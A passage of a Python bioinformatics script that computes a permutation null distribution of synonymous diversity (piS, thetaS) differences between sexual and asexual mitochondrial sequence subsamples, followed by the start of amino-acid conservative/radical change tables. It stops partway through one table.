        'invertebrateMt': {'AGA': 'S', 'AGG': 'S', 'ATA': 'M', 'TGA': 'W'},
        'vertebrateMt': {'AGA': '*', 'AGG': '*', 'ATA': 'M', 'TGA': 'W'},
        'yeastMt': {'CTT': 'T', 'CTC': 'T', 'CTA': 'T', 'CTG': 'T',
                    'ATA': 'M', 'TGA': 'W'},
        'coelenterateMt': {'TGA': 'W'},
        'ciliateNuc': {'TAA': 'Q', 'TAG': 'Q'},
        'echinodermMt': {'AAA': 'N', 'AGA': 'S', 'AGG': 'S', 'TGA': 'W'},
        'euplotidNuc': {'TGA': 'C'},
        'bacterial': {},
        'yeastNuc': {'CTG': 'S'},
        'ascidianMt': {'AGA': 'G', 'AGG': 'G', 'ATA': 'M', 'TGA': 'W'},
        'flatwormMt': {'AAA': 'N', 'AGA': 'S', 'AGG': 'S', 'TAA': 'Y',
                       'TGA': 'W'},
        'chlorophyceanMt': {'TAG': 'L'},
        'trematodeMt': {'AAA': 'N', 'AGA': 'S', 'AGG': 'S', 'ATA': 'M',
                        'TGA': 'W'},
        'pterobranchiaMt': {'AGA': 'S', 'AGG': 'K', 'TGA': 'W'},
    }
    geneticCode = dict(standard)
    geneticCode.update(codeOverrides[code])
    startCodons = ['ATT', 'ATC', 'ATA', 'ATG', 'GTG']  # invertebrateMt code

    seqDict, seqList, codonDict = buildCodonDict(fasta)
    # Population sequences are tagged with '$'; everything else is outgroup.
    popList = [name for name in seqList if '$' in name]
    outList = [name for name in seqList if '$' not in name]

    # Precomputed synonymous-site counts per sequence (keys match the
    # FASTA headers produced by buildCodonDict).
    synSites = {">$Duluth": 2591.52083333, ">$Heron2": 2598, ">$McGregor": 2599, ">$Waik36": 2586.91666667, ">$WalesC": 2584.91666667, ">$clone_1": 2598, ">$AC51": 2598.33333333, ">$Heron_mitochondrion": 2599, ">$clone_7": 2592.85416667, ">$Waik37": 2586.58333333, ">$Gunn": 2597.66666667, ">$DenmarkA": 2593.125, ">$Waik372": 2589.25, ">$Tarawera": 2586.58333333, ">$Poerua_triploid": 2597, ">$Kaniere_triploid": 2586.58333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237": 2593.79166667, ">$Brunner_2_4n": 2593.60416674, ">$Brunner_6_3n": 2592.9583334, ">$Grasmere_1_4n": 2628.66666703, ">$Grasmere_6_3n": 2599.62500001, ">$Poerua_72_4n": 2605.47916675, ">$Rotoiti_1_4n": 2594.35416672, ">$Kaniere_1_2n": 2598.33333333, ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309": 2595, ">$Yellow_Contig_56": 2592.33333333, ">$Alexsex": 2592.33333333, ">$AlexMap": 2592.33333333, ">$Lady": 2598.66666667, ">$Ianthe": 2597, ">$Rotoroa_1_2n": 2598.58333338}

    D1 = {'piS': []}      # null distribution of piS differences (asex - sex)
    D2 = {'thetaS': []}   # null distribution of thetaS differences
    logName = 'mt_nullDistribution_Synonymous.log'

    seqNums = range(len(popList))
    currPCT = 0
    sexN = 8    # sexual subsample size
    asexN = 23  # asexual subsample size
    # aN is defined elsewhere in this file; presumably the harmonic-number
    # denominator a_n = sum(1/i) for Watterson's theta — TODO confirm.
    sexAn = aN(sexN)
    asexAn = aN(asexN)

    outCodons = codonDict[outList[0]]          # outgroup codons, used for rooting
    numCodons = len(codonDict[seqList[0]])     # alignment length in codons

    def _aaOf(cdn, i):
        """Translate codon *cdn* at codon index *i*.

        NOTE(review): the original used `i < 3` here for the alternative
        start-codon exception, while the main tally below uses `i == 0`;
        both behaviors are preserved as-is — confirm which is intended.
        """
        if i < 3 and cdn in startCodons:
            return 'M'
        return geneticCode[cdn]

    def _groupSynStats(groupList):
        """Return (sum2PQ_S, synS) for one subsample.

        sum2PQ_S accumulates expected heterozygosity (2pq terms) at
        synonymous polymorphisms; synS counts synonymous segregating
        changes.  Codons containing 'N' or '-' are ignored.
        """
        sum2PQ = 0.0
        synS = 0
        for i in range(numCodons):
            # Tally codon alleles in this subsample.
            alleleCounts = {}
            alleleOrder = []   # insertion order, needed for pair orientation
            for name in groupList:
                cdn = codonDict[name][i]
                if 'N' in cdn or '-' in cdn:
                    continue
                if cdn in alleleCounts:
                    alleleCounts[cdn] += 1
                else:
                    alleleCounts[cdn] = 1
                    alleleOrder.append(cdn)
            if len(alleleCounts) < 2:
                continue  # monomorphic (or entirely ambiguous) codon
            total = sum(alleleCounts.values())
            # Number of variable nucleotide positions within the codon,
            # counting multi-allelic positions once per extra state.
            sites = [set(), set(), set()]
            for cdn in alleleOrder:
                for p in range(3):
                    sites[p].add(cdn[p])
            totalChanges = sum(len(s) - 1 for s in sites)
            # Allele frequencies and translations.
            freqs = {}
            aaDict = {}
            aaSet = set()
            for cdn in alleleCounts:
                freqs[cdn] = float(alleleCounts[cdn]) / total
                # First codon: alternative start codons translate as M.
                if i == 0 and cdn in startCodons:
                    aa = 'M'
                else:
                    aa = geneticCode[cdn]
                aaDict[cdn] = aa
                aaSet.add(aa)

            if totalChanges == 1:
                # Single segregating change: synonymous iff one amino acid.
                if len(aaSet) == 1:
                    twoPQ = 2.0
                    for f in freqs.values():
                        twoPQ *= f
                    synS += 1
                    sum2PQ += twoPQ
            elif totalChanges == 2:
                if len(alleleCounts) == 3:
                    codonA, codonB, codonC = alleleOrder
                    dAB = sum(1 for p in range(3) if codonA[p] != codonB[p])
                    dAC = sum(1 for p in range(3) if codonA[p] != codonC[p])
                    dBC = sum(1 for p in range(3) if codonB[p] != codonC[p])
                    if dAB == dAC == dBC:
                        # Star topology (all pairwise distances 1): root with
                        # the outgroup codon if it matches one allele;
                        # otherwise the codon contributes nothing.
                        outCodon = outCodons[i]
                        if ('N' not in outCodon and '-' not in outCodon
                                and outCodon in alleleCounts):
                            others = [c for c in alleleOrder if c != outCodon]
                            rootAA = aaDict[outCodon]
                            syn1 = rootAA == aaDict[others[0]]
                            syn2 = rootAA == aaDict[others[1]]
                            if syn1 and syn2:
                                twoPQ = 4.0
                                for f in freqs.values():
                                    twoPQ *= f
                                synS += 2
                                sum2PQ += twoPQ
                            elif syn1:
                                p1 = freqs[others[0]]
                                synS += 1
                                sum2PQ += 2 * p1 * (1 - p1)
                            elif syn2:
                                p2 = freqs[others[1]]
                                synS += 1
                                sum2PQ += 2 * p2 * (1 - p2)
                    else:
                        # One allele is intermediate: it is excluded from the
                        # most-distant pair, and both changes are measured
                        # from it.  (With totalChanges == 2 and unequal
                        # distances, a strict maximum always exists.)
                        if dAB > dAC and dAB > dBC:
                            pair1, pair2 = (codonC, codonB), (codonC, codonA)
                        elif dAC > dAB and dAC > dBC:
                            pair1, pair2 = (codonB, codonA), (codonB, codonC)
                        else:
                            pair1, pair2 = (codonA, codonB), (codonA, codonC)
                        syn1 = _aaOf(pair1[0], i) == _aaOf(pair1[1], i)
                        syn2 = _aaOf(pair2[0], i) == _aaOf(pair2[1], i)
                        if syn1 and syn2:
                            twoPQ = 4.0
                            for f in freqs.values():
                                twoPQ *= f
                            synS += 2
                            sum2PQ += twoPQ
                        elif syn1:
                            p1 = freqs[pair1[1]]
                            synS += 1
                            sum2PQ += 2 * p1 * (1 - p1)
                        elif syn2:
                            p2 = freqs[pair2[1]]
                            synS += 1
                            sum2PQ += 2 * p2 * (1 - p2)
                elif len(alleleCounts) == 2:
                    # Two alleles differing at two positions: both changes
                    # count as synonymous iff the amino acid is unchanged.
                    if len(aaSet) == 1:
                        twoPQ = 2.0
                        for f in freqs.values():
                            twoPQ *= f
                        synS += 2
                        sum2PQ += 2 * twoPQ
            # totalChanges >= 3: not handled (as in the original).
        return sum2PQ, synS

    with open(logName, 'w') as logfile:
        logfile.write('Calculating population genetic parameters:\n')

    while len(D1['piS']) < 10000:
        newPCT = int(round(100 * len(D1['piS']) / 10000.0))
        if newPCT > currPCT:
            with open(logName, 'a') as logfile:
                logfile.write('\t' + str(newPCT) + '% complete\n')
            currPCT = newPCT
        # Draw two disjoint random subsamples (rejection sampling, as in
        # the original, so repeated picks are simply retried).
        sexList = []
        while len(sexList) < sexN:
            pick = popList[random.choice(seqNums)]
            if pick not in sexList:
                sexList.append(pick)
        asexList = []
        while len(asexList) < asexN:
            pick = popList[random.choice(seqNums)]
            if pick not in sexList and pick not in asexList:
                asexList.append(pick)
        # Mean synonymous-site count per subsample.
        sexSynSites = sum(synSites[s] for s in sexList) / float(sexN)
        asexSynSites = sum(synSites[s] for s in asexList) / float(asexN)
        sex_sum2PQ_S, sex_synS = _groupSynStats(sexList)
        asex_sum2PQ_S, asex_synS = _groupSynStats(asexList)
        # n/(n-1) unbiased-pi correction; float() guards against the silent
        # integer truncation (8/7 == 1) the original suffered on Python 2.
        sexPiS = (sexN / float(sexN - 1)) * (sex_sum2PQ_S / sexSynSites)
        asexPiS = (asexN / float(asexN - 1)) * (asex_sum2PQ_S / asexSynSites)
        sexThetaS = sex_synS / (sexAn * sexSynSites)
        asexThetaS = asex_synS / (asexAn * asexSynSites)
        D1['piS'].append(asexPiS - sexPiS)        # pi_S difference
        # BUGFIX: the original assigned the piS list to D2['thetaS'] here,
        # so the theta column silently duplicated the pi column.
        D2['thetaS'].append(asexThetaS - sexThetaS)

    with open(logName, 'a') as logfile:
        logfile.write('Finished calculating population genetic parameters\nSorting Population Genetic Parameters\n')
    sortedD1_syn = sorted(D1['piS'])
    with open(logName, 'a') as logfile:
        logfile.write('\t' + str(round(100 * (1.0 / 2))) + '% complete\n')
    sortedD2_syn = sorted(D2['thetaS'])
    # BUGFIX: this progress line went to a misspelled file
    # ('mt_nullDistribution_Synonymouss.log') in the original.
    with open(logName, 'a') as logfile:
        logfile.write('\t' + str(round(100 * (2.0 / 2))) + '% complete\n')
    with open(logName, 'a') as logfile:
        logfile.write('Finished sorting population genetic parameters\nWriting output to standard out\n')
    sys.stdout.write('πS D\tthetaS D\n')
    for j in range(10000):
        sys.stdout.write(str(sortedD1_syn[j]) + '\t' + str(sortedD2_syn[j]) + '\n')
def CRI(aaList):
aaSchemeList = [1,2,3,4,5,6,7]
aaSchemeDict = {1:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"C",("A","G"):"C",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"C",("A","Y"):"C",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"C",("N","L"):"C",("N","M"):"C",("N","F"):"C",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"C",("N","Y"):"C",("N","V"):"C",("C","Q"):"C",("C","G"):"C",("C","I"):"C",("C","L"):"C",("C","M"):"C",("C","F"):"C",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"C",("C","Y"):"C",("C","V"):"C",("Q","G"):"C",("Q","I"):"C",("Q","L"):"C",("Q","M"):"C",("Q","F"):"C",("Q","P"):"C",("Q","S"):"C",("Q","T"):"C",("Q","W"):"C",("Q","Y"):"C",("Q","V"):"C",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"C",("G","P"):"C",("G","S"):"C",("G","T
"):"C",("G","W"):"C",("G","Y"):"C",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"C",("I","T"):"C",("I","W"):"C",("I","Y"):"C",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"C",("L","T"):"C",("L","W"):"C",("L","Y"):"C",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"C",("M","T"):"C",("M","W"):"C",("M","Y"):"C",("M","V"):"C",("F","P"):"C",("F","S"):"C",("F","T"):"C",("F","W"):"C",("F","Y"):"C",("F","V"):"C",("P","S"):"C",("P","T"):"C",("P","W"):"C",("P","Y"):"C",("P","V"):"C",("S","T"):"C",("S","W"):"C",("S","Y"):"C",("S","V"):"C",("T","W"):"C",("T","Y"):"C",("T","V"):"C",("W","Y"):"C",("W","V"):"C",("Y","V"):"C",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"C",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S",
"A"):"C",("T","A"):"C",("W","A"):"C",("Y","A"):"C",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"C",("L","N"):"C",("M","N"):"C",("F","N"):"C",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"C",("Y","N"):"C",("V","N"):"C",("Q","C"):"C",("G","C"):"C",("I","C"):"C",("L","C"):"C",("M","C"):"C",("F","C"):"C",("P","C"):"C",("S","C"):"C",("T","C"):"C",("W","C"):"C",("Y","C"):"C",("V","C"):"C",("G","Q"):"C",("I","Q"):"C",("L","Q"):"C",("M","Q"):"C",("F","Q"):"C",("P","Q"):"C",("S","Q"):"C",("T","Q"):"C",("W","Q"):"C",("Y","Q"):"C",("V","Q"):"C",("I","G"):"C",("L","G"):"C",("M","G"):"C",("F","G"):"C",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"C",("Y","G"):"C",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"C",("T","I"):"C",("W","I"):"C",("Y","I"):"C",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"C",("T","L"):"C",("W","L"):"C",("Y","L"):"C",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"C",("T","M"):"C",("W","M"):"C",("Y","M"):"C",("V","M"):"C",("P","F"):"C",("S","F"):"C",("T","F"):"C",("W","F"):"C",("Y","F"):"C",("V","F"):"C",("S","P"):"C",("T","P"):"C",("W","P"):"C",("Y","P"):"C",("V","P"):"C",("T","S"):"C",("W","S"):"C",("Y","S"):"C",("V","S"):"C",("W","T"):"C",("Y","T"):"C",("V","T"):"C",("Y","W"):"C",("V","W"):"C",("V","Y"):"C",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},2:{("R","H"):"C",("R","K"):"C",("R","D"):"C",("R","E"):"C",("R","A"):"R",("R","N"):"C",("R","C"):"C"
,("R","Q"):"C",("R","G"):"C",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"C",("R","T"):"C",("R","W"):"R",("R","Y"):"C",("R","V"):"R",("H","K"):"C",("H","D"):"C",("H","E"):"C",("H","A"):"R",("H","N"):"C",("H","C"):"C",("H","Q"):"C",("H","G"):"C",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"C",("H","T"):"C",("H","W"):"R",("H","Y"):"C",("H","V"):"R",("K","D"):"C",("K","E"):"C",("K","A"):"R",("K","N"):"C",("K","C"):"C",("K","Q"):"C",("K","G"):"C",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"C",("K","T"):"C",("K","W"):"R",("K","Y"):"C",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"C",("D","C"):"C",("D","Q"):"C",("D","G"):"C",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"C",("D","T"):"C",("D","W"):"R",("D","Y"):"C",("D","V"):"R",("E","A"):"R",("E","N"):"C",("E","C"):"C",("E","Q"):"C",("E","G"):"C",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"C",("E","T"):"C",("E","W"):"R",("E","Y"):"C",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"R",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"C",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"R",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"C",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"
R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"C",("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"C",("E","R"):"C",("A","R"):"R",("N","R"):"C",("C","R"):"C",("Q","R"):"C",("G","R"):"C",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"C",("T","R"):"C",("W","R"):"R",("Y","R"):"C",("V","R"):"R",("K","H"):"C",("D","H"):"C",("E","H"):"C",("A","H"):"R",("N","H"):"C",("C","H"):"C",("Q","H"):"C",("G","H"):"C",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"C",("T","H"):"C",("W","H"):"R",("Y","H"):"C",("V","H"):"R",("D","K"):"C",("E","K"):"C",("A","K"):"R",("N","K"):"C",("C","K"):"C",("Q","K"):"C",("G","K"):"C",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"C",("T","K"):"C",("W","K"):"R",("Y","K"):"C",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"C",("C","D"):"C",("Q","D"):"C",("G","D"):"C",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"C",("T","D"):"C",("W","D"):"R",("Y","D"):"C",("V","D"):"R",("A","E"):"R",("N","E"):"C",("C","E"):"C",("Q","E"):"C",("G","E"):"C",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"C",("T","E"):"C",("W","E"):"R",("Y","E"):"C",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"R",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N")
:"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"C",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"R",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"C",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},3:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R
","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"C",("D","C"):"R",("D","Q"):"C",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"C",("E","C"):"R",("E","Q"):"C",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"C",("A","I"):"R",("A","L"):"R",("A","M"):"R",("A","F"):"R",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"R",("N","C"):"R",("N","Q"):"C",("N","G"):"R",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"R",("N","T"):"R",("N","W"):"R",("N","Y"):"R",("N","V"):"R",("C","Q"):"R",("C","G"):"R",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"R",("C","T"):"R",("C","W"):"R",("C","Y"):"R",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"R",("Q","T"):"R",("Q","W"):"R",("Q","Y"):"R",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"R",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"R",("I","S"):"R",("I","T"):"R",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"R",("L","S"):"R",(
"L","T"):"R",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"R",("M","S"):"R",("M","T"):"R",("M","W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"C",("F","T"):"C",("F","W"):"R",("F","Y"):"R",("F","V"):"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R",("P","V"):"R",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"R",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R